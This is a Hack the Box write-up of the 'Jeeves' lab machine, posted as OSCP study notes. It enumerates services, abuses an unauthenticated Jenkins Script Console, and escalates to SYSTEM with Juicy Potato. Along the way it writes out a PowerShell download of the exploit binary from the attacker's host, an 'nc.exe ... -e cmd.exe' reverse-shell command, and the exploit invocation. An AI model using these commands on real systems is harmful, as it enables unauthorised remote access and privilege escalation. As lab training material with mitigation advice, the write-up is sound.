Open in app

Sign in

Write

Sign in

Hack the Box — Jeeves(10)

CurlS
8 min readJul 5, 2020

--

HTB is a platorm which provides a large amount of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally to find two flags — a user and a root flag. As I am planning to take the OSCP exam, my focus is to exploit some HTB machines as preparation.

As I tend to remember stuff easier, when writing them down, I decided to summarize the walkthroughs as documentation for later reference or anyone who is interested in this topic.

This is my tenth HTB writeup!

Summary

This box was a good learning experience. I got some new insight into new interesting techniques, such as using the Juicy Potato Exploit to elevate the users’ privileges and about alternate data streams.

What led to the first foodhold was a misonconfigured Jenksins server. It did not enforce user authentificaton, thus allowing unauthenticated to access some powerful features such as the Script Console, where an attacker can execute arbitrary code on the server.

To elevate privileges to nt authority\system the Rotten/Juicy Potato Exploit can be used.

MITRE ATT&CK

T1005 Data from Local System
T1046 Network Service Scanning
T1134 Access Token Manipulation
T1068 Exploitation for Privilege Escalation

Enumeration

Nmap Scan

In order to identifiy vulnerabilities to proceed with exploitations, it is necessary to do a little bit of port scanning and to collect as much information as possible about the target network. I start with a Nmap scan to retrieve an overview of open ports and running services.

nmap -A -p- -T4 10.10.10.63 -oX scanx.xml --webxml

-A: Enable OS detection, version detection, script scanning, and traceroute
-p-: All Ports
-T4: Faster execution (default is T3)
-oX: Save output as xml

Scan Result

Nmap Output

Open Ports: Analysis & Further Enumeration

Port 135: Remote Procedure Call

This is the windows rpc-port. Nothing of interest here.

Port 445: SMB

I checked for null sessions and other enumeration options , but was not succsesful. SMB seems not be reachable through null sessions.

smbclient -U '' -L //10.10.10.97
smbmap -H 10.10.10.97

Port 80: Microsoft-IIS 10.0 / Ask Jeeves Web App

Nothing interesting to be found on this page. Every search leads to the error.html page.

Extract HTML Source Code

The error.html page consists of one image file with some Microsoft SQL Error Data. The error message was Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 — 9.00.4053.00 .... to data type int.

Error Page with one image file as content

It is also recommended to check if fuzzing the web server reveals some hidden directories:

gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
---> Nothing Found.

There seems to be no real attack vector.

Port 50000: Jetty Server ( 9.4.z-SNAPSHOT) / Jenkins

There is a Jetty HTTP Web Server hosted on this port with insight to the Snapshot Version. A quick sarchsploit search did not show any exploit for this version.

Landing Page on Port 50000

Again it is recommended to check if fuzzing reveals any hidden directories.

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.63:50000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/04 14:12:38 Starting gobuster
===============================================================
/askjeeves (Status: 302)

There is a /askjeeves directory, where we have access to a web interface for Jenkins http://10.10.10.63:50000/askjeeves. The Jenkins version is 2.87 (see bottom right corner).

searchsploit does not show any available exploit opportunities for this Jenkins version. A google search for “Exploiting Jenkins” lead me to this page.

Script Console

Wow! The Script Console is available for unauthenciated users. An attacker can use this feature to execute arabitrary Groovy scripts directly on the server! The Script Console can be reached when navigating to Manage Jenkins / Sript Console or by just visiting http://10.10.10.63:50000/askjeeves/script.

I used the code sample from here to quickly test this feature’s functionality, and indeed the whoami command revealed the user name ->kohsuke.

Console Output for Command “whoami”

Using whoami /priv reveals the following Privileges for the User kohsuke. Very interesting, whenever SeImpersonatePrivilege is enabled, one should definitely check the OS Version as often in CTF like boxes this Privilege is the ticket to successfully elevating one’s privileges using the Rotten/Juicy Potato Exploit.

2. First Foothold

It’s time to get a reverse shell to the box with the help of the exposed Script Console Feature of Jenkins. All what is needed is a Groovy Reverse Shell Script, which can be found with a quick google search (check this github repo).

Groovy Reverse Shell Command within Script Console
# nc -nlvp 4455
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
Ncat: Connection from 10.10.10.63.
Ncat: Connection from 10.10.10.63:49679.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.C:\Users\Administrator\.jenkins\users>whoami
whoami
jeeves\kohsuke

We have a reverse shell and can access the user flag.

c:\Users\kohsuke\Desktop> type c:\Users\kohsuke\Desktop\user.txt
 type c:\Users\kohsuke\Desktop\user.txt
e3232....7066a

3. Elavation of Privilege

Rotten/Juicy Potato

What is known about the user kohsuke is that the user has privileges, such as SeImpersonatePrivilege which would allow an attacker to impersonate tokens and elevate privileges to nt system using tools such as Rotton Patato & Juicy Potato.

A detailed description can be found here.

In order that the Juicy Potato Exploit works we need a Windows OS Version below version 1809. Juicy Potato does not work for new Windows Server 2019 and Windows 10 versions 1809 and higher as explained in this blogpost.

We are lucky though, build 10586 is vulnerable to the Rotten/Juicy Potato Exploit.

For the exploit this binary can be used. Once downloaded to the local machine we can transfer the binary to the target system with for example the powershellSystem.Net.Weblcient class.

First, start a HTTP Server on the attacking machine from where the file is located. Note, that default port is 8000 if nothing is stated. Use python3 -m http.server.

c:\Users\kohsuke\Desktop>powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:8000/JuicyPotato.exe','C:/Users/kohsuke/Desktop/JuicyPotato.exe')"c:\Users\kohsuke\Desktop>dir
Directory of c:\Users\kohsuke\Desktop07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 09:53 PM 347,648 JuicyPotato.exe
11/03/2017 11:22 PM 32 user.txt
 2 File(s) 347,680 bytes
 2 Dir(s) 7,234,682,880 bytes free

As netcat will be needed, too for the exploit, transfer the netcat binary the same ways as the above example.

I followed the example as explained on this page. First, I created a bat file that executes : nc.exe 10.10.14.41 4455 -e cmd.exe in order to get a reverse shell.

c:\Users\kohsuke\Desktop>echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat
echo c:\Users\kohsuke\Desktop\nc.exe 10.10.14.41 4455 -e cmd.exe > reverse.bat

Now we can run the Juicy Potato Binary where the reverse.bat will be executed. The appropriate CLSID for the OS has to be used. You might have to try various service CLSIDs in order to make the attack work:

c:\Users\kohsuke\Desktop>juicypotato.exe -l 6666 -p c:\Users\kohsuke\Desktop\reverse.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}juicypotato.exe -l 6666 -p c:\Users\kohsuke\Desktop\reverse.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 6666
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM[+] CreateProcessWithTokenW OK

-l: COM Server Listen Port
-p: Program to launch
-t : Createprocess call
-c : CLSID

We get a shell back on our machine as nt uthority\system.

Unfortunately, there is no no root flag when navigating to the Desktop folder of the Administrator. Instead a message that the flag is elsewhere and one has to look deeeper.

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9Directory of c:\Users\Administrator\Desktop11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,234,617,344 bytes freec:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

First I tried to find any other suspicious files which could contain an admin password, found one interesting approach, but this was not the solution.

C:\Users\Administrator>where /r c: *password*---->
C:\Users\Administrator\.jenkins\secrets\initialAdminPasswordtype C:\Users\Administrator\.jenkins\secrets\initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491--> not working!

It turned out that it was not that complicated…

Alternate Data Streams
All that was needed was the dir /r command to see the hidden file.

Alternate Data Streams can be used to find hidden information respectively from the other perspective to hide secret information. ADS is a NTFS substrucutre and is not visible to most Windows Applications. Any sort of file can be stored within an ADS (txt, image, audio,…)

To hide a file, the following command can be normally used:

echo “userflag” > hm.txt:root.txt. ---> The inputdata was written into the Data Attribute Section.

We can trick the more command by writing the content of the root.txt into a new file in order to read the secret data:

c:\Users\Administrator\Desktop>more <hm.txt:root.txt> newroot.txt
more <hm.txt:root.txt> newroot.txtc:\Users\Administrator\Desktop>type newroot.txt
type newroot.txt
afbc5....92530

Mitigation

  • Jenkins should be securely configured. An unauthenticated user should not be able to use the power of Jenskins Script Console even if it is used for intranet only. This vulnerability gave us a low priv shell. Only Jenkin Admins should have this permission. See also here.
  • On port 80 we found an image file with some SQL Error Messages. Such information should not be leaked.

Other WriteUps

Hack the Box — Devel (1)
Hack the Box — Servmon (2)
Hack the Box — Chatterbox (5)

Links

https://gcattani.github.io/201502/jenkins-console-script

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://github.com/ohpe/juicy-potato/releases

https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/

https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#eop---impersonation-privileges

Htb
Hackthebox Writeup
Hacking

--

--

CurlS

Written by CurlS

305 Followers

Working in Infosec. Interested in many things, from technical perspective -> security, ctfs, coding, reverse engineering,… and in general -> love life. She.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams